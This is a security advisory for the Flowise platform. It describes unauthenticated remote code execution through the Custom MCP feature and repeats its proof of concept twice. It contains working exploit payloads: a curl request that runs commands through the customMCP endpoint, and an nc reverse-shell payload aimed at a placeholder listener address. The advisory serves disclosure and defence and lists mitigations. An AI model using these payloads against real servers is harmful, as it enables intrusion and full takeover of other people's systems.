Headline
GHSA-6933-jpx5-q87q: Flowise has unsandboxed remote code execution via Custom MCP
Summary
The Custom MCPs feature is designed to execute OS commands, for instance, using tools like npx
to spin up local MCP Servers. However, Flowise’s inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, the default installation of Flowise operates without authentication unless explicitly configured using the FLOWISE_USERNAME
and FLOWISE_PASSWORD
environment variables.
This combination presents a significant security risk, potentially allowing users on the platform to execute unsandboxed system commands. This can result in Remote Code Execution (RCE) and complete compromise of the running platform container or server.
PoC
Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as
npx
,pnpm
, etc): https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-dockerCreate a new file named
payload.json
somewhere in your machine, with the following data:
{"inputs":{"mcpServerConfig":{"command": "touch","args": ["/tmp/yofitofi"]}},"loadMethod":"listActions"}
- Send the following
curl
request using thepayload.json
file created above with the following command:
curl -XPOST -H "x-request-from: internal" -H "Content-Type: application/json" --data @payload.json "http://localhost:3000/api/v1/node-load-method/customMCP"
- Observe that a new file named
yofitofi
is created under/tmp
folder.
Similarily, we can use the same technique to gain a reverse shell using the built-in nc
utility with the following JSON payload:
{"inputs":{"mcpServerConfig":{"command": "nc","args": [
"<LISTENER_IP_ADDRESS>","<LISTENER_PORT>","-e","/bin/sh"
]}},
"loadMethod":"listActions"}
Impact
Remote code execution
Mitigation
- Consider adding additional access controls surronding sensitive functionality such as Custom MCP, e.g. only users with “Admin” roles will be able to configure new Custom MCPs within the platform.
- Consider disabling the Custom MCP feature by default, with a clear disclaimer for end users on the implications of enabling this feature.
- Consider running Custom MCPs within a sandboxed environment
Credit
The vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.
Summary
The Custom MCPs feature is designed to execute OS commands, for instance, using tools like npx to spin up local MCP Servers. However, Flowise’s inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, the default installation of Flowise operates without authentication unless explicitly configured using the FLOWISE_USERNAME and FLOWISE_PASSWORD environment variables.
This combination presents a significant security risk, potentially allowing users on the platform to execute unsandboxed system commands. This can result in Remote Code Execution (RCE) and complete compromise of the running platform container or server.
PoC
Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as npx, pnpm, etc):
https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-dockerCreate a new file named payload.json somewhere in your machine, with the following data:
{"inputs":{"mcpServerConfig":{"command": "touch","args": ["/tmp/yofitofi"]}},"loadMethod":"listActions"}
Send the following curl request using the payload.json file created above with the following command:
curl -XPOST -H “x-request-from: internal” -H “Content-Type: application/json” --data @payload.json “http://localhost:3000/api/v1/node-load-method/customMCP”
- Observe that a new file named yofitofi is created under /tmp folder.
Similarily, we can use the same technique to gain a reverse shell using the built-in nc utility with the following JSON payload:
{"inputs":{"mcpServerConfig":{"command": "nc","args": [
"<LISTENER_IP_ADDRESS>","<LISTENER_PORT>","-e","/bin/sh"
]}},
"loadMethod":"listActions"}
Impact
Remote code execution
Mitigation
- Consider adding additional access controls surronding sensitive functionality such as Custom MCP, e.g. only users with “Admin” roles will be able to configure new Custom MCPs within the platform.
- Consider disabling the Custom MCP feature by default, with a clear disclaimer for end users on the implications of enabling this feature.
- Consider running Custom MCPs within a sandboxed environment
Credit
The vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.
References
- GHSA-6933-jpx5-q87q
- FlowiseAI/Flowise#5201
- FlowiseAI/Flowise@ac7cf30
- https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6